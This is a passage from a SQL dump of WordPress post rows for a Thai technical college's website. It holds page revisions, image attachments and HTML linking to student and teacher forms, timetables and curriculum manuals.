(1189, 4, '2018-02-16 18:56:59', '2018-02-16 11:56:59', 'แบบคำร้องขอเปิดภาคเรียนฤดูร้อน\r\n\r\nแบบคำร้องขออนุญาตไปเรียนสถานศึกษาอื่น', 'แบบฟอร์มสำหรับนักเรียนนักศึกษา', '', 'publish', 'closed', 'closed', '', '%e0%b9%81%e0%b8%9a%e0%b8%9a%e0%b8%9f%e0%b8%ad%e0%b8%a3%e0%b9%8c%e0%b8%a1%e0%b8%aa%e0%b8%b3%e0%b8%ab%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99', '', '', '2018-09-28 05:13:21', '2018-09-27 22:13:21', '', 0, 'http://www.technicrayong.ac.th/?page_id=1189', 0, 'page', '', 0),
(1190, 4, '2018-02-16 18:56:59', '2018-02-16 11:56:59', 'ฟอร์มคำร้องขอเปิดภาคเรียนฤดูร้อน\r\n\r\nแบบคำร้องขออนุญาตไปเรียนสถานศึกษาอื่น', 'แบบฟอร์มสำหรับนักเรียนนักศึกษา', '', 'inherit', 'closed', 'closed', '', '1189-revision-v1', '', '', '2018-02-16 18:56:59', '2018-02-16 11:56:59', '', 1189, 'http://www.technicrayong.ac.th/1189-revision-v1/', 0, 'revision', '', 0),
(1191, 4, '2018-02-16 18:58:34', '2018-02-16 11:58:34', '<h4><a href=\"https://wp.me/P9wTWB-iW\">ตารางสอน</a></h4>\r\n<h4><a href=\"https://wp.me/P9wTWB-j2\">ตารางเรียน</a></h4>\r\nเอกสารพัฒนาการเรียนการสอน\r\n\r\n<a href=\"http://bsq2.vec.go.th/document/%E0%B8%84%E0%B8%B9%E0%B9%88%E0%B8%A1%E0%B8%B7%E0%B8%AD%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%97%E0%B8%B3%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%A3%E0%B8%B9%E0%B9%89%E0%B8%A1%E0%B8%B8%E0%B9%88%E0%B8%87%E0%B9%80%E0%B8%99%E0%B9%89%E0%B8%99%E0%B8%AA%E0%B8%A1%E0%B8%A3%E0%B8%A3%E0%B8%96%E0%B8%99%E0%B8%B0%20(%E0%B9%80%E0%B8%A5%E0%B9%88%E0%B8%A1%E0%B8%97%E0%B8%B5%E0%B9%88%201)/%E0%B9%80%E0%B8%A5%E0%B9%88%E0%B8%A1%E0%B8%97%E0%B8%B5%E0%B9%881.rar\"> คู่มือการจัดทำแผนการเรียนรู้มุ่งเน้นสมรรถนะ </a>\r\n\r\n<a href=\"http://bsq2.vec.go.th/document/%E0%B8%84%E0%B8%B9%E0%B9%88%E0%B8%A1%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%82%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%A7%E0%B8%B4%E0%B8%88%E0%B8%B1%E0%B8%A2%E0%B9%80%E0%B8%9E%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%9E%E0%B8%B1%E0%B8%92%E0%B8%99%E0%B8%B2%E0%B8%84%E0%B8%B8%E0%B8%A3%E0%B8%A0%E0%B8%B2%E0%B8%9E%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%AA%E0%B8%AD%E0%B8%99%E0%B8%AD%E0%B8%B2%E0%B8%8A%E0%B8%B5%E0%B8%A7%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9%E0%B8%B2/%E0%B9%80%E0%B8%A5%E0%B9%88%E0%B8%A1%E0%B8%97%E0%B8%B5%E0%B9%882.rar\"> คู่มือการเขียนรายงานการวิจัย</a>\r\n\r\n<a href=\"https://wp.me/P9wTWB-gF\"><strong>แบบฟอร์มสำหรับครูผู้สอน</strong></a>\r\n\r\n<a href=\"https://wp.me/P9wTWB-jb\">แบบฟอร์มสำหรับนักเรียนนักศึกษา</a>\r\n\r\n ', 'งานพัฒนาหลักสูตรและการเรียนการสอน', '', 'inherit', 'closed', 'closed', '', '1000-revision-v1', '', '', '2018-02-16 18:58:34', '2018-02-16 11:58:34', '', 1000, 'http://www.technicrayong.ac.th/1000-revision-v1/', 0, 'revision', '', 0),
(1192, 3, '2018-06-19 13:52:01', '2018-06-19 06:52:01', '<img class=\"aligncenter wp-image-1193 size-full\" src=\"/wp-content/uploads/2018/02/19-2-2561-9-35-41.jpg\" alt=\"\" width=\"829\" height=\"617\" />\r\n\r\n<a href=\"/วิสัยทัศน์\"><img class=\"alignnone wp-image-1200 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a>\r\n\r\n<a href=\"/พันธกิจ\"><img class=\"alignnone wp-image-1204 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a>\r\n\r\n<a href=\"/ปรัชญา\"><img class=\"alignnone wp-image-1203 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"300\" height=\"117\" /></a>\r\n\r\n<a href=\"/อัตลักษณ์\"><img class=\"alignnone wp-image-1202 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"300\" height=\"114\" /></a>', 'เอกลักษณ์', '', 'inherit', 'closed', 'closed', '', '1109-autosave-v1', '', '', '2018-06-19 13:52:01', '2018-06-19 06:52:01', '', 1109, 'http://www.technicrayong.ac.th/1109-autosave-v1/', 0, 'revision', '', 0),
(1193, 3, '2018-02-19 09:34:26', '2018-02-19 02:34:26', '', '19-2-2561 9-35-41', '', 'inherit', 'closed', 'closed', '', '19-2-2561-9-35-41', '', '', '2018-02-19 09:34:26', '2018-02-19 02:34:26', '', 1109, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/19-2-2561-9-35-41.jpg', 0, 'attachment', 'image/jpeg', 0),
(1194, 3, '2018-02-19 09:34:59', '2018-02-19 02:34:59', '<img class=\"aligncenter wp-image-1193 size-full\" src=\"/wp-content/uploads/2018/02/19-2-2561-9-35-41.jpg\" alt=\"\" width=\"829\" height=\"617\" />', 'เอกลักษณ์', '', 'inherit', 'closed', 'closed', '', '1109-revision-v1', '', '', '2018-02-19 09:34:59', '2018-02-19 02:34:59', '', 1109, 'http://www.technicrayong.ac.th/1109-revision-v1/', 0, 'revision', '', 0),
(1195, 3, '2018-06-19 13:54:22', '2018-06-19 06:54:22', '<img class=\"aligncenter wp-image-1169\" src=\"/wp-content/uploads/2018/02/16-2-2561-16-17-21-300x179.jpg\" alt=\"\" width=\"1200\" height=\"716\" />\r\n\r\n<img class=\"aligncenter wp-image-1198 size-full\" src=\"/wp-content/uploads/2018/02/19-2-2561-10-48-21.jpg\" alt=\"\" width=\"517\" height=\"96\" />\r\n\r\n<img class=\"wp-image-1197 size-full aligncenter\" src=\"/wp-content/uploads/2018/02/19-2-2561-10-41-04.jpg\" alt=\"\" width=\"822\" height=\"614\" />\r\n\r\n<a href=\"/วิสัยทัศน์\"><img class=\"alignnone wp-image-1200 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a>\r\n\r\n<a href=\"/พันธกิจ\"><img class=\"alignnone wp-image-1204 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a>\r\n\r\n<a href=\"/ปรัชญา\"><img class=\"alignnone wp-image-1203 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"300\" height=\"117\" /></a>\r\n\r\n<a href=\"/เอกลักษณ์\"><img class=\"alignnone wp-image-1201 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"300\" height=\"112\" /></a>\r\n\r\n \r\n\r\n ', 'อัตลักษณ์', '', 'inherit', 'closed', 'closed', '', '1167-autosave-v1', '', '', '2018-06-19 13:54:22', '2018-06-19 06:54:22', '', 1167, 'http://www.technicrayong.ac.th/1167-autosave-v1/', 0, 'revision', '', 0),
(1197, 3, '2018-02-19 10:39:55', '2018-02-19 03:39:55', '', '19-2-2561 10-41-04', '', 'inherit', 'closed', 'closed', '', '19-2-2561-10-41-04', '', '', '2018-02-19 10:39:55', '2018-02-19 03:39:55', '', 1167, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/19-2-2561-10-41-04.jpg', 0, 'attachment', 'image/jpeg', 0),
(1198, 3, '2018-02-19 10:47:12', '2018-02-19 03:47:12', '', '19-2-2561 10-48-21', '', 'inherit', 'closed', 'closed', '', '19-2-2561-10-48-21', '', '', '2018-02-19 10:47:12', '2018-02-19 03:47:12', '', 1167, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/19-2-2561-10-48-21.jpg', 0, 'attachment', 'image/jpeg', 0),
(1199, 3, '2018-02-19 10:49:45', '2018-02-19 03:49:45', '<img class=\"aligncenter wp-image-1169\" src=\"/wp-content/uploads/2018/02/16-2-2561-16-17-21-300x179.jpg\" alt=\"\" width=\"1200\" height=\"716\" />\r\n\r\n<img class=\"aligncenter wp-image-1198 size-full\" src=\"/wp-content/uploads/2018/02/19-2-2561-10-48-21.jpg\" alt=\"\" width=\"517\" height=\"96\" />\r\n\r\n<img class=\"wp-image-1197 size-full aligncenter\" src=\"/wp-content/uploads/2018/02/19-2-2561-10-41-04.jpg\" alt=\"\" width=\"822\" height=\"614\" />\r\n\r\n \r\n\r\n ', 'อัตลักษณ์', '', 'inherit', 'closed', 'closed', '', '1167-revision-v1', '', '', '2018-02-19 10:49:45', '2018-02-19 03:49:45', '', 1167, 'http://www.technicrayong.ac.th/1167-revision-v1/', 0, 'revision', '', 0),
(1200, 3, '2018-02-19 11:12:30', '2018-02-19 04:12:30', '', '19-2-2561 11-07-46', '', 'inherit', 'closed', 'closed', '', '19-2-2561-11-07-46', '', '', '2018-02-19 11:12:30', '2018-02-19 04:12:30', '', 930, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/19-2-2561-11-07-46.jpg', 0, 'attachment', 'image/jpeg', 0),
(1201, 3, '2018-02-19 11:12:38', '2018-02-19 04:12:38', '', '19-2-2561 11-13-08', '', 'inherit', 'closed', 'closed', '', '19-2-2561-11-13-08', '', '', '2018-02-19 11:12:38', '2018-02-19 04:12:38', '', 930, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/19-2-2561-11-13-08.jpg', 0, 'attachment', 'image/jpeg', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1202, 3, '2018-02-19 11:12:39', '2018-02-19 04:12:39', '', '19-2-2561 11-12-53', '', 'inherit', 'closed', 'closed', '', '19-2-2561-11-12-53', '', '', '2018-02-19 11:12:39', '2018-02-19 04:12:39', '', 930, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/19-2-2561-11-12-53.jpg', 0, 'attachment', 'image/jpeg', 0),
(1203, 3, '2018-02-19 11:12:41', '2018-02-19 04:12:41', '', '19-2-2561 11-08-12', '', 'inherit', 'closed', 'closed', '', '19-2-2561-11-08-12', '', '', '2018-02-19 11:12:41', '2018-02-19 04:12:41', '', 930, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/19-2-2561-11-08-12.jpg', 0, 'attachment', 'image/jpeg', 0),
(1204, 3, '2018-02-19 11:14:28', '2018-02-19 04:14:28', '', '19-2-2561 11-08-25', '', 'inherit', 'closed', 'closed', '', '19-2-2561-11-08-25', '', '', '2018-02-19 11:14:28', '2018-02-19 04:14:28', '', 930, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/19-2-2561-11-08-25.jpg', 0, 'attachment', 'image/jpeg', 0),
(1209, 3, '2018-02-19 12:04:17', '2018-02-19 05:04:17', '<h3><img class=\"alignleft wp-image-947\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1552\" height=\"650\" /></h3>\r\n<h4><img class=\"wp-image-952 size-full alignleft\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-10-53.jpg\" alt=\"\" width=\"826\" height=\"530\" /><img class=\"wp-image-953 size-full alignleft\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-26.jpg\" alt=\"\" width=\"819\" height=\"557\" /><img class=\"wp-image-954 size-full alignleft\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-46.jpg\" alt=\"\" width=\"831\" height=\"576\" /></h4>\r\n \r\n\r\n<a href=\"/%E0%B8%A7%E0%B8%B4%E0%B8%AA%E0%B8%B1%E0%B8%A2%E0%B8%97%E0%B8%B1%E0%B8%A8%E0%B8%99%E0%B9%8C/\"><img class=\"alignleft wp-image-1200 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /><img class=\"alignleft wp-image-1204 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /><img class=\"size-medium wp-image-1203 alignleft\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"300\" height=\"117\" /><img class=\"size-medium wp-image-1201 alignleft\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"300\" height=\"112\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<img class=\"size-medium wp-image-1202 alignleft\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"300\" height=\"114\" />\r\n\r\n \r\n\r\n<img class=\"size-medium wp-image-1205 alignleft\" src=\"/wp-content/uploads/2018/02/1-1-300x211.jpg\" alt=\"\" width=\"300\" height=\"211\" /><img class=\"size-medium wp-image-1208 alignleft\" src=\"/wp-content/uploads/2018/02/2-300x217.jpg\" alt=\"\" width=\"300\" height=\"217\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<img class=\"size-medium wp-image-1207 alignnone\" src=\"/wp-content/uploads/2018/02/3-300x213.jpg\" alt=\"\" width=\"300\" height=\"213\" />\r\n\r\n<img class=\"size-medium wp-image-1206 alignleft\" src=\"/wp-content/uploads/2018/02/4-300x230.jpg\" alt=\"\" width=\"300\" height=\"230\" />', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-02-19 12:04:17', '2018-02-19 05:04:17', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(1210, 3, '2018-02-19 12:11:17', '2018-02-19 05:11:17', '<h3><img class=\"alignleft wp-image-947\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1552\" height=\"650\" /></h3>\r\n<h4><img class=\"wp-image-952 size-full alignleft\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-10-53.jpg\" alt=\"\" width=\"826\" height=\"530\" /><img class=\"wp-image-953 size-full alignleft\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-26.jpg\" alt=\"\" width=\"819\" height=\"557\" /><img class=\"wp-image-954 size-full alignleft\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-46.jpg\" alt=\"\" width=\"831\" height=\"576\" /></h4>\r\n \r\n\r\n<a href=\"/%E0%B8%A7%E0%B8%B4%E0%B8%AA%E0%B8%B1%E0%B8%A2%E0%B8%97%E0%B8%B1%E0%B8%A8%E0%B8%99%E0%B9%8C/\"><img class=\"alignleft wp-image-1200 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /><img class=\"alignleft wp-image-1204 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /><img class=\"size-medium wp-image-1203 alignleft\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"300\" height=\"117\" /><img class=\"size-medium wp-image-1201 alignleft\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"300\" height=\"112\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<img class=\"size-medium wp-image-1202 alignleft\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"300\" height=\"114\" />\r\n\r\n \r\n\r\n-<img class=\"alignleft wp-image-1205 size-medium\" src=\"/wp-content/uploads/2018/02/1-1-300x211.jpg\" alt=\"\" width=\"300\" height=\"211\" /><img class=\"alignleft wp-image-1208 size-medium\" src=\"/wp-content/uploads/2018/02/2-300x217.jpg\" alt=\"\" width=\"300\" height=\"217\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<img class=\"alignleft wp-image-1207 size-medium\" src=\"/wp-content/uploads/2018/02/3-300x213.jpg\" alt=\"\" width=\"300\" height=\"213\" />\r\n\r\n<img class=\"alignleft wp-image-1206 size-medium\" src=\"/wp-content/uploads/2018/02/4-300x230.jpg\" alt=\"\" width=\"300\" height=\"230\" />', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-02-19 12:11:17', '2018-02-19 05:11:17', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(1211, 3, '2018-02-19 12:13:08', '2018-02-19 05:13:08', '<h3><img class=\"alignleft wp-image-947\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1552\" height=\"650\" /></h3>\r\n<h4><img class=\"wp-image-952 size-full alignleft\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-10-53.jpg\" alt=\"\" width=\"826\" height=\"530\" /><img class=\"wp-image-953 size-full alignleft\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-26.jpg\" alt=\"\" width=\"819\" height=\"557\" /><img class=\"wp-image-954 size-full alignleft\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-46.jpg\" alt=\"\" width=\"831\" height=\"576\" /></h4>\r\n \r\n\r\n<a href=\"/%E0%B8%A7%E0%B8%B4%E0%B8%AA%E0%B8%B1%E0%B8%A2%E0%B8%97%E0%B8%B1%E0%B8%A8%E0%B8%99%E0%B9%8C/\"><img class=\"wp-image-1200 size-medium alignnone\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /><img class=\"wp-image-1204 size-medium alignnone\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /><img class=\"size-medium wp-image-1203 alignnone\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"300\" height=\"117\" /><img class=\"size-medium wp-image-1201 alignnone\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"300\" height=\"112\" /></a>\r\n\r\n<img class=\"size-medium wp-image-1202 alignnone\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"300\" height=\"114\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n-<img class=\"wp-image-1205 size-medium alignnone\" src=\"/wp-content/uploads/2018/02/1-1-300x211.jpg\" alt=\"\" width=\"300\" height=\"211\" /><img class=\"wp-image-1208 size-medium alignnone\" src=\"/wp-content/uploads/2018/02/2-300x217.jpg\" alt=\"\" width=\"300\" height=\"217\" />\r\n\r\n<img class=\"wp-image-1207 size-medium alignleft\" src=\"/wp-content/uploads/2018/02/3-300x213.jpg\" alt=\"\" width=\"300\" height=\"213\" />\r\n\r\n<img class=\"wp-image-1206 size-medium alignnone\" src=\"/wp-content/uploads/2018/02/4-300x230.jpg\" alt=\"\" width=\"300\" height=\"230\" />', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-02-19 12:13:08', '2018-02-19 05:13:08', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(1212, 3, '2018-02-19 14:02:06', '2018-02-19 07:02:06', '<h3><img class=\"alignleft wp-image-947\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1552\" height=\"650\" /></h3>\r\n<h4><img class=\"alignleft wp-image-952\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-10-53.jpg\" alt=\"\" width=\"1000\" height=\"642\" /><img class=\"alignleft wp-image-953 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-26.jpg\" alt=\"\" width=\"819\" height=\"557\" /><img class=\"alignleft wp-image-954 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-46.jpg\" alt=\"\" width=\"831\" height=\"576\" /></h4>\r\n \r\n\r\n<a href=\"/%E0%B8%A7%E0%B8%B4%E0%B8%AA%E0%B8%B1%E0%B8%A2%E0%B8%97%E0%B8%B1%E0%B8%A8%E0%B8%99%E0%B9%8C/\"><img class=\"wp-image-1200 size-medium alignnone\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /><img class=\"wp-image-1204 size-medium alignnone\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /><img class=\"size-medium wp-image-1203 alignnone\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"300\" height=\"117\" /><img class=\"size-medium wp-image-1201 alignnone\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"300\" height=\"112\" /></a>\r\n\r\n<img class=\"size-medium wp-image-1202 alignnone\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"300\" height=\"114\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n-<img class=\"wp-image-1205 size-medium alignnone\" src=\"/wp-content/uploads/2018/02/1-1-300x211.jpg\" alt=\"\" width=\"300\" height=\"211\" /><img class=\"wp-image-1208 size-medium alignnone\" src=\"/wp-content/uploads/2018/02/2-300x217.jpg\" alt=\"\" width=\"300\" height=\"217\" />\r\n\r\n<img class=\"wp-image-1207 size-medium alignleft\" src=\"/wp-content/uploads/2018/02/3-300x213.jpg\" alt=\"\" width=\"300\" height=\"213\" />\r\n\r\n<img class=\"wp-image-1206 size-medium alignnone\" src=\"/wp-content/uploads/2018/02/4-300x230.jpg\" alt=\"\" width=\"300\" height=\"230\" />', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-02-19 14:02:06', '2018-02-19 07:02:06', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(1213, 3, '2018-02-19 14:03:01', '2018-02-19 07:03:01', '<h3><img class=\"alignleft wp-image-947\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1552\" height=\"650\" /></h3>\r\n<h4><img class=\"alignleft wp-image-952 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-10-53.jpg\" alt=\"\" width=\"826\" height=\"530\" /><img class=\"alignleft wp-image-953 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-26.jpg\" alt=\"\" width=\"819\" height=\"557\" /><img class=\"alignleft wp-image-954 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-46.jpg\" alt=\"\" width=\"831\" height=\"576\" /></h4>\r\n \r\n\r\n<a href=\"/%E0%B8%A7%E0%B8%B4%E0%B8%AA%E0%B8%B1%E0%B8%A2%E0%B8%97%E0%B8%B1%E0%B8%A8%E0%B8%99%E0%B9%8C/\"><img class=\"wp-image-1200 size-medium alignnone\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /><img class=\"wp-image-1204 size-medium alignnone\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /><img class=\"size-medium wp-image-1203 alignnone\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"300\" height=\"117\" /><img class=\"size-medium wp-image-1201 alignnone\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"300\" height=\"112\" /></a>\r\n\r\n<img class=\"size-medium wp-image-1202 alignnone\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"300\" height=\"114\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n-<img class=\"wp-image-1205 size-medium alignnone\" src=\"/wp-content/uploads/2018/02/1-1-300x211.jpg\" alt=\"\" width=\"300\" height=\"211\" /><img class=\"wp-image-1208 size-medium alignnone\" src=\"/wp-content/uploads/2018/02/2-300x217.jpg\" alt=\"\" width=\"300\" height=\"217\" />\r\n\r\n<img class=\"wp-image-1207 size-medium alignleft\" src=\"/wp-content/uploads/2018/02/3-300x213.jpg\" alt=\"\" width=\"300\" height=\"213\" />\r\n\r\n<img class=\"wp-image-1206 size-medium alignnone\" src=\"/wp-content/uploads/2018/02/4-300x230.jpg\" alt=\"\" width=\"300\" height=\"230\" />', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-02-19 14:03:01', '2018-02-19 07:03:01', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(1214, 3, '2018-02-19 14:10:14', '2018-02-19 07:10:14', '', '19-2-2561 14-06-48', '', 'inherit', 'closed', 'closed', '', '19-2-2561-14-06-48', '', '', '2018-02-19 14:10:14', '2018-02-19 07:10:14', '', 930, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/19-2-2561-14-06-48.jpg', 0, 'attachment', 'image/jpeg', 0),
(1215, 3, '2018-02-19 14:12:10', '2018-02-19 07:12:10', '<h3><img class=\"alignleft wp-image-947\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1552\" height=\"650\" /></h3>\r\n<h4><img class=\"alignleft wp-image-952 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-10-53.jpg\" alt=\"\" width=\"826\" height=\"530\" /></h4>\r\n<h3></h3>\r\n<h4><img class=\"alignleft wp-image-953 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-26.jpg\" alt=\"\" width=\"819\" height=\"557\" /></h4>\r\n<h3></h3>\r\n<h4><img class=\"alignleft wp-image-954 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-46.jpg\" alt=\"\" width=\"831\" height=\"576\" /></h4>\r\n \r\n\r\n<a href=\"/%E0%B8%A7%E0%B8%B4%E0%B8%AA%E0%B8%B1%E0%B8%A2%E0%B8%97%E0%B8%B1%E0%B8%A8%E0%B8%99%E0%B9%8C/\"><img class=\"wp-image-1200 size-medium alignnone\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /><img class=\"wp-image-1204 size-medium alignnone\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /><img class=\"size-medium wp-image-1203 alignnone\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"300\" height=\"117\" /><img class=\"size-medium wp-image-1201 alignnone\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"300\" height=\"112\" /></a>\r\n<h3></h3>\r\n<img class=\"size-medium wp-image-1202 alignnone\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"300\" height=\"114\" />\r\n\r\n \r\n<p 